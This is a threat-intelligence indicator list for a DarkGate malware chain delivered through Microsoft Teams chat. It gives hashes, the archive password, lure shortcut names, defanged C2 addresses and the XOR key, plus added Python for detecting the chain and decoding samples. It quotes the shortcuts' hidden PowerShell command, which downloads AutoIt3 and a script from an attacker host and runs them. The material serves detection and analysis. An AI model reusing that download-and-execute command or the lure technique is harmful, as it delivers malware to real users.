2023-10-12 (THURSDAY): DARKGATE INFECTION FROM TEAMS CHAT
REFERENCES:
- https://www.linkedin.com/posts/unit42_darkgate-timelythreatintelligence-threatintel-activity-7118377814826905600-idoc
- https://twitter.com/Unit42_Intel/status/1712612195651998098
NOTES:
- This infection chain has been reported through multiple sources as early as September 2023.
SOME REFERENCES FOLLOW:
- https://www.techrepublic.com/article/darkgate-loader-malware-microsoft-teams/
- https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-pushes-darkgate-malware/
- https://www.malwarebytes.com/blog/news/2023/09/microsoft-teams-used-to-deliver-darkgate-loader-malware
INFECTION CHAIN:
- Teams chat message --> password-protected zip archive --> extracted Windows shortcuts -->
Powershell command string --> AutoIt3 & .au3 script --> encoded binary for DarkGate --> DarkGate C2
PASSWORD-PROTECTED ZIP ARCHIVES:
- Password: Company2023
- 36bc501e5fb8520c1b713d70251424fa484f045abbb205682ff445f46f3d1201 - 8,937 bytes - Company Update October 2023.zip
- 4877106143a7fc8871614f2e19c51e9f7f4ff77ed5990881c9714422d3cb4c0b - 8,937 bytes - Company Update October 2023.zip
- 73d2a8c1ba0860fef33ff46da8880ceb00c6a355a6bba14758be83fc17c845ab - 6,427 bytes - Navigating Future Changes 2023.zip
- 8fa71bb4079780710ca354a312f5a887fe7bd9f3a744e43c19f5eb87aed65c0f - 6,427 bytes - Navigating Future Changes 2023.zip
CONTENTS OF BOTH "COMPANY UPDATE OCTOBER 2023" ZIP ARCHIVES:
- SHA256 hash: ba18f678b08580795416148d2bba5b0a0b7be4c85b8501a28f49c8141268ec57
- File size: 2,854 bytes
- File names:
-- 01_Strategic_Transformations_2023_Confidential.pdf.lnk
-- 02_Organizational_Structure_Update_2023_Confidential.pdf.lnk
-- 03_New_Mission_and_Core_Values_2023_Confidential.pdf.lnk
-- 04_Employees_Affected_by_Transition_2023_Confidential.pdf.lnk
-- 05_Position_Guidelines_October_2023_Confidential.pdf.lnk
-- 06_FAQs_and_Support_Resources_2023_Confidential.pdf.lnk
-- 07_Next_Steps_and_Timeline_2023_Confidential.pdf.lnk
- SHA256 hash: 4afbeb1589b96d9e1c3bf88ef1e528a87c6d580092d7552db53819e503ab2458
- File size: 2,854 bytes
- File names:
-- Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.pdf.lnk
-- Navigating_Our_Evolution_October_2023_Confidential.pdf.lnk
-- Redefining_Our_Structural_Canvas_2023_Confidential.pdf.lnk
-- Role_Directives_Effective_2023_Confidential.pdf.lnk
-- Transition_Journey_2023_Confidential.pdf.lnk
- SHA256 hash: 7b03a759123dbb2429e1e7a506e5281b3ecc0d4a655bf5affc3650f9d8e20a24
- File size: 2,854 bytes
- File names:
-- Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.pdf.lnk
-- Navigating_Our_Evolution_October_2023_Confidential.pdf.lnk
-- Redefining_Our_Structural_Canvas_2023_Confidential.pdf.lnk
-- Role_Directives_Effective_2023_Confidential.pdf.lnk
-- Transition_Journey_2023_Confidential.pdf.lnk
EXAMPLE OF POWERSHELL COMMAND GENERATED BY THE ABOVE WINDOWS SHORTCUTS:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle Hidden -Command "&{ ni "C:\temp" -Type Directory -Force;
cd "C:\temp";
Invoke-WebRequest -Uri "hxxp://hgfdytrywq[.]com:80/a" -OutFile "AutoIt3.exe";
Invoke-WebRequest -Uri "hxxp://hgfdytrywq[.]com:80/xmbxmi" -OutFile "nAdowY.au3";
start "AutoIt3.exe" -a "nAdowY.au3"}"
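The shortcut-launched PowerShell string above is a useful detection pattern on its own: a hidden window, two Invoke-WebRequest downloads into C:\temp, and AutoIt3.exe started against a .au3 script. The following triage helper is an added example, not part of the original IOC list, that scores process-creation command lines against those traits; the log lines it runs on are constructed here, and the download host in them (download.example) is a placeholder rather than the real infrastructure.

```python
# Added example (not from the IOC list): flag PowerShell command lines that
# match the shortcut-to-AutoIt3 download pattern described above.
import re

# Indicator names and patterns are derived from the defanged command string
# in the IOC list. Each one alone is weak; several together are worth a look.
INDICATORS = [
    ("hidden_window", re.compile(r"-WindowStyle\s+Hidden", re.I)),
    ("web_download", re.compile(r"Invoke-WebRequest\b.*?-OutFile", re.I | re.S)),
    ("autoit_exe", re.compile(r"AutoIt3\.exe", re.I)),
    ("au3_script", re.compile(r"\S+\.au3\b", re.I)),
    ("temp_dir", re.compile(r"C:\\temp\b", re.I)),
]

# Constructed process-creation records (not real telemetry). Line 2 mirrors
# the structure of the shortcut's command; the host name is a placeholder.
SAMPLE_LOGS = [
    'CommandLine=powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'CommandLine=powershell.exe -WindowStyle Hidden -Command "&{ ni "C:\\temp" -Type Directory -Force; '
    'cd "C:\\temp"; Invoke-WebRequest -Uri "hxxp://download.example/a" -OutFile "AutoIt3.exe"; '
    'Invoke-WebRequest -Uri "hxxp://download.example/s" -OutFile "script.au3"; '
    'start "AutoIt3.exe" -a "script.au3"}"',
    'CommandLine=C:\\Windows\\explorer.exe',
]


def score_command_line(cmd):
    """Return the names of every indicator that matches this command line."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def triage(log_lines, min_hits=3):
    """Return (line_number, hits) for each PowerShell command line that
    matches at least min_hits indicators. Non-PowerShell lines are skipped."""
    results = []
    for n, line in enumerate(log_lines, 1):
        if "powershell" not in line.lower():
            continue
        hits = score_command_line(line)
        if len(hits) >= min_hits:
            results.append((n, hits))
    return results


if __name__ == "__main__":
    for n, hits in triage(SAMPLE_LOGS):
        print(f"line {n}: {len(hits)} indicators: {', '.join(hits)}")
```

The threshold of three indicators is a tuning choice: a benign administrative script may legitimately use Invoke-WebRequest with -OutFile, but combining that with a hidden window and an AutoIt3 launch of a freshly downloaded .au3 file is the specific chain this list documents.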
EXAMPLES OF DOWNLOADED .AU3 SCRIPT FILES:
- c01d186f412fac04b0b80c6242c378ee00d1c63affb83d44ee75f65a08f4e966 - 12,815 bytes - nAdowY.au3
- d841110e05dc8970c1f96ec038ff98a4f463c2b5e96d114a84e4c3bb97628797 - 12,584 bytes - oWUNju.au3
- c786fba049049139859c8d552f957780628b437c11af0720c0c13481897b7244 - 12,708 bytes - qBQslF.au3
INITIAL TRAFFIC FROM AN INFECTED WINDOWS HOST:
- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /a HTTP/1.1 <-- copy of AutoIt3.exe
- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /gdlxsh HTTP/1.1 <-- .au3 file
- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /yjnchp HTTP/1.1 <-- encoded binary for DarkGate EXE
POST-INFECTION C2:
- 172.67.166[.]185 port 8080 - hgfdytrywq[.]com:8080 - POST / HTTP/1.0
- 172.67.166[.]185 port 80 - hgfdytrywq[.]com - POST / HTTP/1.0
POST-INFECTION MALWARE/ARTIFACTS:
- SHA256 hash: 307e554435ba5edc9c2b1d11e940d5656f748bd399465ae05dfc4a40e30a363f
- File size: 397,320 bytes
- File location: hxxp://hgfdytrywq[.]com/yjnchp
- File description: XOR-encoded binary retrieved by .au3 file
- Note: 8-byte ASCII string used to XOR-encode this binary: kREMUwNi
- SHA256 hash: 7fc3126b9c53816657076b62188f9905067ec4b070deea5999cd6d7aa3c85c76
- File size: 397,312 bytes
- File description: Decoded DarkGate EXE
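The list gives the 8-byte ASCII string kREMUwNi as the XOR key for the encoded binary, together with the SHA256 of both the encoded and decoded files, so an analyst can reproduce the decoding and confirm the result against the listed hash. The decoder below is an added example, not code from the IOC list or from the .au3 loader; it XORs a file against a repeating key and reports the SHA256 of the output. The encoded file is 8 bytes larger than the decoded EXE, but the list does not say how the loader stores the key or any other prefix, so the optional `skip` parameter (an assumption of this example) only lets the analyst try dropping a leading prefix before decoding.

```python
# Added example (not from the IOC list): repeating-key XOR decoder with a
# SHA256 check, so a decoded sample can be compared against a known hash.
import hashlib
import sys
from itertools import cycle


def xor_with_key(data, key):
    """XOR data against a repeating key. XOR is its own inverse, so the same
    call both encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def looks_like_pe(data):
    """Cheap sanity check: a decoded Windows executable starts with 'MZ'."""
    return data[:2] == b"MZ"


def decode_and_check(encoded, key, expected_sha256=None, skip=0):
    """Decode from offset `skip` onward and optionally compare the result's
    SHA256 with an expected value. Returns (decoded, sha256, match) where
    match is None when no expected hash was supplied. The skip offset is an
    assumption of this example, not something the IOC list documents."""
    decoded = xor_with_key(encoded[skip:], key)
    digest = sha256_hex(decoded)
    match = None if expected_sha256 is None else digest == expected_sha256.lower()
    return decoded, digest, match


if __name__ == "__main__":
    if len(sys.argv) < 3:
        # Usage against a real sample: encoded file, ASCII key, optional expected hash and skip.
        # Below, a constructed blob stands in for the sample so the script runs offline.
        key = b"kREMUwNi"  # key string taken from the IOC list above
        fake_exe = b"MZ\x90\x00" + bytes(range(60))  # constructed, not a real PE
        encoded = xor_with_key(fake_exe, key)
        decoded, digest, match = decode_and_check(encoded, key, sha256_hex(fake_exe))
        print(f"constructed blob: PE header {looks_like_pe(decoded)}, hash match {match}")
        sys.exit(0)
    path, key = sys.argv[1], sys.argv[2].encode()
    expected = sys.argv[3] if len(sys.argv) > 3 else None
    skip = int(sys.argv[4]) if len(sys.argv) > 4 else 0
    with open(path, "rb") as f:
        encoded = f.read()
    decoded, digest, match = decode_and_check(encoded, key, expected, skip)
    print(f"decoded {len(decoded)} bytes, sha256 {digest}, PE header {looks_like_pe(decoded)}")
    if expected is not None:
        print("matches expected hash" if match else "does NOT match expected hash")
```

Running it on a real encoded sample and comparing against the listed decoded hash tells the analyst whether the key and offset are right; the MZ check is a quick indicator that a wrong key or offset has been used, since an incorrect decode almost never yields a valid DOS header.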